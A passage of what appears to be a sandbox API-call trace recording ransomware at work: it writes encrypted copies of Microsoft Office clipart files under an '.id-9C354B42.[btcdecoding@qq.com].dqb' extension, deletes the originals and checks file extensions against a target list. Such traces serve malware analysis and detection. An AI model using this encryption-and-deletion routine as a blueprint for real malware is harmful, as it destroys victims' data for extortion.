lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.566] WriteFile (in: hFile=0x214, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.566] SetEndOfFile (hFile=0x214) returned 1 [0055.566] CloseHandle (hObject=0x214) returned 1 [0055.567] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.567] SetEndOfFile (hFile=0x240) returned 1 [0055.567] CloseHandle (hObject=0x240) returned 1 [0055.567] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.568] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00923_.wmf")) returned 1 [0055.568] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 63 [0055.568] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 63 [0055.568] lstrlenW (lpString=".doc") returned 4 [0055.568] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.568] lstrlenW (lpString=".docx") returned 5 [0055.568] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.568] lstrlenW (lpString=".pdf") returned 4 [0055.568] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.568] lstrlenW (lpString=".xls") returned 4 [0055.568] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.568] lstrlenW (lpString=".xlsx") returned 5 [0055.568] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.568] lstrlenW (lpString=".ppt") returned 4 [0055.568] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.568] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 63 [0055.568] lstrlenW (lpString=".zip") returned 4 [0055.568] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.568] lstrlenW (lpString=".rar") returned 4 [0055.568] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.568] lstrlenW (lpString=".bz2") returned 4 [0055.568] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.568] lstrlenW (lpString=".7z") returned 3 [0055.569] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 63 [0055.569] lstrlenW (lpString=".dbf") returned 4 [0055.569] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 63 [0055.569] lstrlenW (lpString=".1cd") returned 4 [0055.569] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 63 [0055.569] lstrlenW (lpString=".jpg") returned 4 [0055.569] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.570] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.570] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.570] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00932_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0055.570] GetLastError () returned 0x0 [0055.570] ReadFile (in: hFile=0x240, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x4c14, lpOverlapped=0x0) returned 1 [0055.572] WriteFile (in: hFile=0x214, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x4c20, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x4c20, lpOverlapped=0x0) returned 1 [0055.573] ReadFile (in: hFile=0x240, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.573] WriteFile (in: hFile=0x214, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.573] SetEndOfFile (hFile=0x214) returned 1 [0055.573] CloseHandle (hObject=0x214) returned 1 [0055.573] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.573] SetEndOfFile (hFile=0x240) returned 1 [0055.574] CloseHandle (hObject=0x240) returned 1 [0055.574] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.574] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00932_.wmf")) returned 1 [0055.575] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 63 [0055.575] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 63 [0055.575] lstrlenW (lpString=".doc") returned 4 [0055.575] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.575] lstrlenW (lpString=".docx") returned 5 [0055.575] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.575] lstrlenW (lpString=".pdf") returned 4 [0055.575] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.575] lstrlenW (lpString=".xls") returned 4 [0055.575] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.575] lstrlenW (lpString=".xlsx") returned 5 [0055.575] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.575] lstrlenW (lpString=".ppt") returned 4 [0055.575] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.575] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 63 [0055.575] lstrlenW (lpString=".zip") returned 4 [0055.575] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.575] lstrlenW (lpString=".rar") returned 4 [0055.575] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.575] lstrlenW (lpString=".bz2") returned 4 [0055.575] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.575] lstrlenW (lpString=".7z") returned 3 [0055.575] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.576] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 63 [0055.576] lstrlenW (lpString=".dbf") returned 4 [0055.576] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.576] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 63 [0055.576] lstrlenW (lpString=".1cd") returned 4 [0055.576] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.576] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 63 [0055.576] lstrlenW (lpString=".jpg") returned 4 [0055.576] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.576] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.576] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.576] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00985_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0055.576] GetLastError () returned 0x0 [0055.576] ReadFile (in: hFile=0x240, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0xeb8, lpOverlapped=0x0) returned 1 [0055.578] WriteFile (in: hFile=0x214, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec0, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec0, lpOverlapped=0x0) returned 1 [0055.579] ReadFile (in: hFile=0x240, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.579] WriteFile (in: hFile=0x214, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.579] SetEndOfFile (hFile=0x214) returned 1 [0055.579] CloseHandle (hObject=0x214) returned 1 [0055.579] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.579] SetEndOfFile (hFile=0x240) returned 1 [0055.580] CloseHandle (hObject=0x240) returned 1 [0055.580] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.580] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00985_.wmf")) returned 1 [0055.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 63 [0055.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 63 [0055.581] lstrlenW (lpString=".doc") returned 4 [0055.581] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.581] lstrlenW (lpString=".docx") returned 5 [0055.581] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.581] lstrlenW (lpString=".pdf") returned 4 [0055.581] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.581] lstrlenW (lpString=".xls") returned 4 [0055.581] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.581] lstrlenW (lpString=".xlsx") returned 5 [0055.581] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.581] lstrlenW (lpString=".ppt") returned 4 [0055.581] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 63 [0055.581] lstrlenW (lpString=".zip") returned 4 [0055.581] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.581] lstrlenW (lpString=".rar") returned 4 [0055.581] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.581] lstrlenW (lpString=".bz2") returned 4 [0055.581] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.581] lstrlenW (lpString=".7z") returned 3 [0055.581] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 63 [0055.581] lstrlenW (lpString=".dbf") returned 4 [0055.581] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 63 [0055.581] lstrlenW (lpString=".1cd") returned 4 [0055.581] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 63 [0055.581] lstrlenW (lpString=".jpg") returned 4 [0055.581] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.582] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.582] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.582] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\boat.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0055.582] GetLastError () returned 0x0 [0055.582] ReadFile (in: hFile=0x240, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0xd16, lpOverlapped=0x0) returned 1 [0055.584] WriteFile (in: hFile=0x214, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xd20, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xd20, lpOverlapped=0x0) returned 1 [0055.585] ReadFile (in: hFile=0x240, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.585] WriteFile (in: hFile=0x214, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xe4, lpOverlapped=0x0) returned 1 [0055.585] SetEndOfFile (hFile=0x214) returned 1 [0055.585] CloseHandle (hObject=0x214) returned 1 [0055.585] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.585] SetEndOfFile (hFile=0x240) returned 1 [0055.586] CloseHandle (hObject=0x240) returned 1 [0055.586] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.586] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\boat.wmf")) returned 1 [0055.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF") returned 59 [0055.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF") returned 59 [0055.586] lstrlenW (lpString=".doc") returned 4 [0055.586] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.586] lstrlenW (lpString=".docx") returned 5 [0055.586] lstrcmpiW (lpString1=".docx", lpString2="T.WMF") returned -1 [0055.586] lstrlenW (lpString=".pdf") returned 4 [0055.587] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.587] lstrlenW (lpString=".xls") returned 4 [0055.587] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.587] lstrlenW (lpString=".xlsx") returned 5 [0055.587] lstrcmpiW (lpString1=".xlsx", lpString2="T.WMF") returned -1 [0055.587] lstrlenW (lpString=".ppt") returned 4 [0055.587] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF") returned 59 [0055.587] lstrlenW (lpString=".zip") returned 4 [0055.587] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.587] lstrlenW (lpString=".rar") returned 4 [0055.587] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.587] lstrlenW (lpString=".bz2") returned 4 [0055.587] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.587] lstrlenW (lpString=".7z") returned 3 [0055.587] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF") returned 59 [0055.587] lstrlenW (lpString=".dbf") returned 4 [0055.587] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF") returned 59 [0055.587] lstrlenW (lpString=".1cd") returned 4 [0055.587] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF") returned 59 [0055.587] lstrlenW (lpString=".jpg") returned 4 [0055.587] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.587] GetFileSizeEx (in: hFile=0x240, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=29004) returned 1 [0055.587] CloseHandle (hObject=0x240) returned 1 [0055.588] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\boatinst.wmf")) returned 0x20 [0055.588] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\boatinst.wmf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0055.588] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\boatinst.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x240 [0055.588] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.588] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.588] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\boatinst.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0055.588] GetLastError () returned 0x0 [0055.588] ReadFile (in: hFile=0x240, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x714c, lpOverlapped=0x0) returned 1 [0055.591] WriteFile (in: hFile=0x214, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x7150, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x7150, lpOverlapped=0x0) returned 1 [0055.592] ReadFile (in: hFile=0x240, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.592] WriteFile (in: hFile=0x214, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.592] SetEndOfFile (hFile=0x214) returned 1 [0055.592] CloseHandle (hObject=0x214) returned 1 [0055.593] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.593] SetEndOfFile (hFile=0x240) returned 1 [0055.594] CloseHandle (hObject=0x240) returned 1 [0055.594] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.594] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\boatinst.wmf")) returned 1 [0055.594] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 63 [0055.594] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 63 [0055.594] lstrlenW (lpString=".doc") returned 4 [0055.594] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.594] lstrlenW (lpString=".docx") returned 5 [0055.594] lstrcmpiW (lpString1=".docx", lpString2="T.WMF") returned -1 [0055.594] lstrlenW (lpString=".pdf") returned 4 [0055.594] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.594] lstrlenW (lpString=".xls") returned 4 [0055.594] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.594] lstrlenW (lpString=".xlsx") returned 5 [0055.594] lstrcmpiW (lpString1=".xlsx", lpString2="T.WMF") returned -1 [0055.594] lstrlenW (lpString=".ppt") returned 4 [0055.594] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.594] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 63 [0055.594] lstrlenW (lpString=".zip") returned 4 [0055.594] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.594] lstrlenW (lpString=".rar") returned 4 [0055.594] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.595] lstrlenW (lpString=".bz2") returned 4 [0055.595] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.595] lstrlenW (lpString=".7z") returned 3 [0055.595] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.595] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 63 [0055.595] lstrlenW (lpString=".dbf") returned 4 [0055.595] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.595] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 63 [0055.595] lstrlenW (lpString=".1cd") returned 4 [0055.595] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.595] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 63 [0055.595] lstrlenW (lpString=".jpg") returned 4 [0055.595] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.595] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.595] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.595] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00076_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0055.596] GetLastError () returned 0x0 [0055.596] ReadFile (in: hFile=0x240, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x532, lpOverlapped=0x0) returned 1 [0055.597] WriteFile (in: hFile=0x214, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x540, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x540, lpOverlapped=0x0) returned 1 [0055.598] ReadFile (in: hFile=0x240, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.598] WriteFile (in: hFile=0x214, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.598] SetEndOfFile (hFile=0x214) returned 1 [0055.598] CloseHandle (hObject=0x214) returned 1 [0055.598] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.598] SetEndOfFile (hFile=0x240) returned 1 [0055.599] CloseHandle (hObject=0x240) returned 1 [0055.599] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.599] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00076_.wmf")) returned 1 [0055.599] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 63 [0055.599] lstrlenW (lpString="C:\\Program Files\\Microsoft 